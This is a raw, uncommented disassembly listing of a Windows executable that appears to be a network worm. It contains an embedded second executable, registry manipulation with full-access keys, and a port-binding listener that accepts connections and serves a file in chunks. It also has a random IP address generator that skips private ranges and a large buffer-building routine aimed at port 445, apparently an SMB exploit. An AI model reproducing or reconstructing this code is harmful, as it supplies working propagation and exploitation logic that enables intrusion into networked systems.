sub_43DCA4 proc near ; CODE XREF: sub_43D98E+32�p
jmp dword ptr ds:10005114h
sub_43DCA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCB0 proc near ; CODE XREF: sub_43D616+13�p
jmp dword ptr ds:10005118h
sub_43DCB0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCBC proc near ; CODE XREF: .text:0043DBD7�p
jmp dword ptr ds:1000511Ch
sub_43DCBC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCC8 proc near ; CODE XREF: sub_43D760+33�p
; sub_43D760+45�p ...
jmp dword ptr ds:10005128h
sub_43DCC8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCD4 proc near ; CODE XREF: sub_43D760+B�p
; sub_43D760+17�p ...
jmp dword ptr ds:1000512Ch
sub_43DCD4 endp
; ---------------------------------------------------------------------------
align 10h
jmp dword ptr ds:10005130h
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; ---------------------------------------------------------------------------
jmp dword ptr ds:10005134h
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DCF8 proc near ; CODE XREF: sub_43D7F8+58�p
; sub_43D7F8+96�p
jmp dword ptr ds:10005138h
sub_43DCF8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD04 proc near ; CODE XREF: sub_43D8E4+23�p
jmp dword ptr ds:1000513Ch
sub_43DD04 endp
; ---------------------------------------------------------------------------
align 10h
jmp dword ptr ds:10005140h
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD1C proc near ; CODE XREF: .text:0043D71C�p
jmp dword ptr ds:10005144h
sub_43DD1C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD28 proc near ; CODE XREF: sub_43D760+71�p
; sub_43D760+86�p
jmp dword ptr ds:10005148h
sub_43DD28 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD34 proc near ; CODE XREF: .text:0043DAF5�p
jmp dword ptr ds:1000514Ch
sub_43DD34 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD40 proc near ; CODE XREF: sub_43DAA7+14�p
; .text:0043DBC6�p
jmp dword ptr ds:10005150h
sub_43DD40 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DD4C proc near ; CODE XREF: sub_43D7F8+B7�p
jmp dword ptr ds:10005154h
sub_43DD4C endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
; char Dest[]
Dest db 'abcdefghijklmno',0 ; DATA XREF: sub_403BE7+283�o
aAy db 'Ay&',0
db '\',0
aTtii db '’’ˆë»',0
align 10h
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 0
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
dd 427CB50Ah, 0
dd 7028h, 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h
dd 1536h, 703Ch, 0
dd 62694C5Fh, 6E69614Dh, 323140h, 6Eh dup(0)
db 0
byte_43EB9D db 4Dh, 5Ah, 90h ; DATA XREF: sub_403A5F+CC�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_43EFBD proc near ; CODE XREF: .text:0043F0F5�p
; .text:0043F123�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_43EFDA: ; CODE XREF: sub_43EFBD+44�j
; sub_43EFBD+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43F009
cmp esi, [esp+1Ch+arg_4]
jz short loc_43F009
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43EFDA
call dword ptr [ebx+esi*4+8]
jmp short loc_43EFDA
; ---------------------------------------------------------------------------
loc_43F009: ; CODE XREF: sub_43EFBD+2A�j
; sub_43EFBD+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43EFBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F017 proc near ; CODE XREF: .text:0043F0E8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_401092
push [ebp+arg_0]
call sub_440755
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43F017 endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr loc_404086+6, eax
mov dword ptr loc_40408D+3, ebx
test dword ptr [eax+4], 6
jnz loc_43F11C
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
mov dword ptr loc_40408D+3, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43F07A: ; CODE XREF: .text:0043F113�j
cmp esi, 0FFFFFFFFh
jz loc_43F12B
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43F10A
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr loc_40402C+4, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr loc_404033+1, eax
mov eax, [edx+4]
mov dword ptr loc_404033+5, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, loc_40403B+1
mov esi, dword ptr loc_404033+1
rep movsd
lea edi, loc_40403B+1
mov dword ptr loc_404033+1, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43F10A
js short loc_43F118
mov edi, [ebx+8]
push ebx
call sub_43F017
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43EFBD
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43F10A: ; CODE XREF: .text:0043F08B�j
; .text:0043F0E0�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43F07A
; ---------------------------------------------------------------------------
loc_43F118: ; CODE XREF: .text:0043F0E2�j
xor eax, eax
jmp short loc_43F18D
; ---------------------------------------------------------------------------
loc_43F11C: ; CODE XREF: .text:0043F05A�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43EFBD
add esp, 0Ch
loc_43F12B: ; CODE XREF: .text:0043F07D�j
push 0
mov dword ptr loc_40400E+2, 0Bh
push 0Bh
call sub_4408F9
add esp, 8
or eax, eax
jnz short loc_43F166
push 0
mov dword ptr loc_40400E+2, 8
push 8
call sub_4408F9
add esp, 8
or eax, eax
jnz short loc_43F166
mov eax, 1
jmp short loc_43F18D
; ---------------------------------------------------------------------------
loc_43F166: ; CODE XREF: .text:0043F143�j
; .text:0043F15D�j
cmp eax, 0FFFFFFFFh
jz short loc_43F195
push eax
push dword ptr loc_40400E+2
call sub_4408F9
add esp, 8
push dword ptr loc_40400E+2
call sub_4408E1
add esp, 4
mov eax, 1
loc_43F18D: ; CODE XREF: .text:0043F11A�j
; .text:0043F164�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43F195: ; CODE XREF: .text:0043F169�j
cmp dword ptr loc_40402C, 0
jnz short loc_43F1A5
mov eax, 1
jmp short loc_43F18D
; ---------------------------------------------------------------------------
loc_43F1A5: ; CODE XREF: .text:0043F19C�j
mov eax, dword ptr loc_40402C
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_43F18D
; ---------------------------------------------------------------------------
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 40401Ch
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push 404028h
push 404024h
push offset loc_404020
call sub_4408A5
push dword ptr loc_404025+3
push dword ptr loc_404023+1
push dword ptr loc_404020
mov dword ptr loc_40400E+6, esp
call sub_4405FD
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_4408BD
leave
retn
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F239 proc near ; CODE XREF: sub_43F2D4+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_440899
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_43F25C: ; CODE XREF: sub_43F239+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F25C
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_43F284
; ---------------------------------------------------------------------------
loc_43F26E: ; CODE XREF: sub_43F239+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_43F284: ; CODE XREF: sub_43F239+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_43F26E
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_43F2B0
; ---------------------------------------------------------------------------
loc_43F29E: ; CODE XREF: sub_43F239+88�j
push 404DE5h
push edi
call sub_44091D
add esp, 8
add [ebp+var_3], 1
loc_43F2B0: ; CODE XREF: sub_43F239+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_43F29E
push [ebp+arg_8]
push edi
call sub_44091D
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_43F239 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F2D4 proc near ; CODE XREF: sub_4403F5+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push 404DE3h
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_43F239
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_44070D
leave
retn
sub_43F2D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F2F9 proc near ; CODE XREF: .text:004403B3�p
; sub_4403F5+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_44085D
mov edi, eax
or edi, edi
jz short loc_43F329
xor eax, eax
jmp short loc_43F361
; ---------------------------------------------------------------------------
loc_43F329: ; CODE XREF: sub_43F2F9+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_44088D
mov edi, eax
push [ebp+var_4]
call sub_440869
or edi, edi
jz short loc_43F351
xor eax, eax
jmp short loc_43F361
; ---------------------------------------------------------------------------
loc_43F351: ; CODE XREF: sub_43F2F9+52�j
cmp [ebp+var_8], 1
jnz short loc_43F35E
mov eax, 2
jmp short loc_43F361
; ---------------------------------------------------------------------------
loc_43F35E: ; CODE XREF: sub_43F2F9+5C�j
xor eax, eax
inc eax
loc_43F361: ; CODE XREF: sub_43F2F9+2E�j
; sub_43F2F9+56�j ...
pop edi
leave
retn
sub_43F2F9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F364 proc near ; CODE XREF: .text:0044038C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_440875
mov edi, eax
or edi, edi
jz short loc_43F389
xor eax, eax
jmp short loc_43F3B4
; ---------------------------------------------------------------------------
loc_43F389: ; CODE XREF: sub_43F364+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_440881
mov edi, eax
push [ebp+var_4]
call sub_440869
or edi, edi
jz short loc_43F3B1
xor eax, eax
jmp short loc_43F3B4
; ---------------------------------------------------------------------------
loc_43F3B1: ; CODE XREF: sub_43F364+47�j
xor eax, eax
inc eax
loc_43F3B4: ; CODE XREF: sub_43F364+23�j
; sub_43F364+4B�j
pop edi
leave
retn
sub_43F364 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_4405B5
cmp eax, 0FFFFFFFFh
jz loc_43F4FB
push 404DDFh
lea eax, [ebp-100h]
push eax
call sub_440935
add esp, 8
or eax, eax
jz loc_43F4BD
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_440935
add esp, 8
or eax, eax
jz loc_43F4BD
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_4405C1
push dword ptr loc_403004
push 404D86h
lea eax, [ebp-200h]
push eax
call sub_440905
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_43F450: ; CODE XREF: .text:0043F455�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F450
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_4405C1
loc_43F469: ; CODE XREF: .text:0043F4AF�j
mov eax, dword ptr loc_403004
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_43F47F
mov edi, 1000h
loc_43F47F: ; CODE XREF: .text:0043F478�j
or edi, edi
jz short loc_43F4B1
push 0
push edi
mov eax, ebx
add eax, dword ptr loc_403004+4
push eax
push dword ptr [ebp+8]
call sub_4405C1
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_43F4FB
cmp esi, 1000h
jb short loc_43F4B1
add ebx, esi
push 64h
call sub_44076D
jmp short loc_43F469
; ---------------------------------------------------------------------------
loc_43F4B1: ; CODE XREF: .text:0043F481�j
; .text:0043F4A4�j
push 404098h
call sub_440725
jmp short loc_43F4DF
; ---------------------------------------------------------------------------
loc_43F4BD: ; CODE XREF: .text:0043F3FA�j
; .text:0043F416�j
push 0
push 15h
push 404D70h
push dword ptr [ebp+8]
call sub_4405C1
push 0
push 0Dh
push 40409Ch
push dword ptr [ebp+8]
call sub_4405C1
loc_43F4DF: ; CODE XREF: .text:0043F4BB�j
push 7D0h
call sub_44076D
push 2
push dword ptr [ebp+8]
call sub_4405CD
push dword ptr [ebp+8]
call sub_440555
loc_43F4FB: ; CODE XREF: .text:0043F3DE�j
; .text:0043F49C�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push 404098h
call sub_440719
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset loc_403010
call sub_44073D
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_43F541
push 1
call sub_4406AD
loc_43F541: ; CODE XREF: .text:0043F538�j
push 0
push ebx
call sub_4406D1
mov dword ptr loc_403004, eax
push eax
push 0
call sub_440731
mov dword ptr loc_403004+4, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr loc_403004
push dword ptr loc_403004+4
push ebx
call sub_440749
push ebx
call sub_4406E9
push 0
push 1
push 2
call sub_4405D9
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_440761
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_43F5A1: ; CODE XREF: .text:0043F5E1�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr loc_404092+2, ax
movzx eax, word ptr loc_404092+2
push eax
call sub_440585
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_440549
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_43F5E3
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_43F5A1
loc_43F5E3: ; CODE XREF: .text:0043F5D6�j
push 64h
push esi
call sub_4405A9
mov dword ptr [ebp-4], 10h
loc_43F5F2: ; CODE XREF: .text:0043F61D�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_44053D
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_440791
push eax
call sub_4406E9
jmp short loc_43F5F2
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F624 proc near ; CODE XREF: .text:0043FE57�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, loc_4040AA
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, loc_4040B4+6
mov ecx, 5
rep movsb
loc_43F64D: ; CODE XREF: sub_43F624+51�j
; sub_43F624+74�j
call sub_4408ED
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_43F69E
; ---------------------------------------------------------------------------
loc_43F66A: ; CODE XREF: sub_43F624+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_43F64D
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_43F69A
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_43F69A
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_43F64D
loc_43F69A: ; CODE XREF: sub_43F624+5A�j
; sub_43F624+6B�j
inc [ebp+var_2]
loc_43F69E: ; CODE XREF: sub_43F624+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_43F66A
loc_43F6A7: ; CODE XREF: sub_43F624+AC�j
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_43F6D2
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_43F6A7
loc_43F6D2: ; CODE XREF: sub_43F624+A1�j
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_440905
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_43F624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F725 proc near ; CODE XREF: .text:0044005C�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_440661
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, loc_4049EB+5
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_4405D9
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD7B
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_44059D
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_440779
lea eax, [ebp+var_6900]
push eax
push 404D5Ah
lea eax, [ebp+var_7C]
push eax
call sub_440905
add esp, 0Ch
xor ebx, ebx
loc_43F7B6: ; CODE XREF: sub_43F725+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_43F7B6
push 60h
push offset loc_404525
lea eax, [ebp+var_303C]
push eax
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
push 9
push 40457Ch
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
mov edx, eax
